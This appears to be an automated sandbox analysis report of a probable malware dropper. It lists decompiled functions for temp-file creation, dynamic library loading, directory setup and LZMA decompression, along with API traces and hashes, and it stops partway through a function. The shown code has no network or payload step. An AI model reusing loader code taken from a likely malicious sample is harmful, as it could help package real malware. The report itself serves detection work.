                                                Function 0040589E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040589E(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                0x004058a2
                                                0x004058a8
                                                0x004058a9
                                                0x004058a9
                                                0x004058aa
                                                0x004058b1
                                                0x004058bb
                                                0x004058c8
                                                0x004058cb
                                                0x004058d3
                                                0x00000000
                                                0x00000000
                                                0x004058d7
                                                0x00000000
                                                0x00000000
                                                0x004058d9
                                                0x00000000
                                                0x004058d9
                                                0x00000000

                                                APIs
                                                • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,004030F9,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004058B1
                                                • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 004058CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-1498418707
                                                • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                • Instruction ID: e60e9e2f6482c2c4b9a71223117799e22c549444224f45eff9547ee1bfe60b0e
                                                • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                • Instruction Fuzzy Hash: 46F0A7373482447AE7105E55DC04B9B7F9DDFD1750F10C027FE049A280D6B49954C7A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1001A7DD, Relevance: 7.7, APIs: 5, Instructions: 204fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1001A9AC
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 001ebef15b0206ca0fcb44dfa8cbf1268c027215aea593ba9889f6cc766d45c8
                                                • Instruction ID: 370712f530380b5801cd0399227dc53b8984abf9dd23a4cc290a1da1f4a01a83
                                                • Opcode Fuzzy Hash: 001ebef15b0206ca0fcb44dfa8cbf1268c027215aea593ba9889f6cc766d45c8
                                                • Instruction Fuzzy Hash: 19712935E50348AADB60CBE4E956BEDB7B5EF48710F20841AE508EE2E0E7705E81DB05
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 60%
                                                			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x423ff8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x423fc8 =  *0x423fc8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404E84(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b010, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040358B(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                0x00401f84
                                                0x00401f84
                                                0x00401f89
                                                0x00401f90
                                                0x0040204c
                                                0x00402197
                                                0x00402197
                                                0x004028be
                                                0x004028c1
                                                0x004028cd
                                                0x004028cd
                                                0x00401f9f
                                                0x00401fa9
                                                0x00401fac
                                                0x00401fbb
                                                0x00401fbf
                                                0x00401fc5
                                                0x00401fc9
                                                0x00402045
                                                0x00000000
                                                0x00402045
                                                0x00401fcb
                                                0x00401fd5
                                                0x00401fd9
                                                0x0040201d
                                                0x00401fdb
                                                0x00401fde
                                                0x00401fe1
                                                0x00402011
                                                0x00401fe3
                                                0x00401fe6
                                                0x00401fef
                                                0x00401ff1
                                                0x00401ff1
                                                0x00401fef
                                                0x00401fe1
                                                0x00402025
                                                0x0040203a
                                                0x0040203a
                                                0x00000000
                                                0x00402025
                                                0x00401faf
                                                0x00401fb5
                                                0x00401fb9
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                  • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                  • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                  • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                                  • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
                                                • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                • String ID:
                                                • API String ID: 2987980305-0
                                                • Opcode ID: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                • Instruction ID: 27648393275eec621602a0353e8cc2bfbc6c1dadd98057bfccdba155e6fc7477
                                                • Opcode Fuzzy Hash: 50cd007fc7b77623f8c7ad5bc39ef5e257e3bb497f63aa12232a7c38023ecf07
                                                • Instruction Fuzzy Hash: 07215732D04215ABDF216FA48F4DAAE7970AF44354F60423FFA11B22E0CBBC4981D65E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 87%
                                                			E004015B3(char __ebx) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040571F(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056B6(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053C3(_t28);
						} else {
							_t38 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004053E0(_t38) == 0) {
								goto L5;
							} else {
								_t22 = E00405346(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B98("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                0x004015b3
                                                0x004015ba
                                                0x004015bd
                                                0x004015c2
                                                0x004015c6
                                                0x004015c8
                                                0x004015d0
                                                0x004015d2
                                                0x004015d4
                                                0x004015d8
                                                0x004015db
                                                0x004015f3
                                                0x004015f4
                                                0x004015dd
                                                0x004015dd
                                                0x004015e0
                                                0x00000000
                                                0x004015eb
                                                0x004015ec
                                                0x004015ec
                                                0x004015e0
                                                0x004015fb
                                                0x00401602
                                                0x0040160f
                                                0x0040160f
                                                0x00401604
                                                0x00401605
                                                0x0040160d
                                                0x00000000
                                                0x00000000
                                                0x0040160d
                                                0x00401602
                                                0x00401612
                                                0x00401615
                                                0x00401617
                                                0x00401618
                                                0x004015c8
                                                0x0040161f
                                                0x0040164a
                                                0x00402197
                                                0x00401621
                                                0x00401623
                                                0x0040162e
                                                0x00401634
                                                0x0040163c
                                                0x00401642
                                                0x00401642
                                                0x0040163c
                                                0x004028c1
                                                0x004028cd

                                                APIs
                                                  • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                                  • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                                • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                  • Part of subcall function 00405346: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                • API String ID: 1892508949-2935972921
                                                • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                                • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                                • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406609, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 99%
                                                			E00406609() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00406A77))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
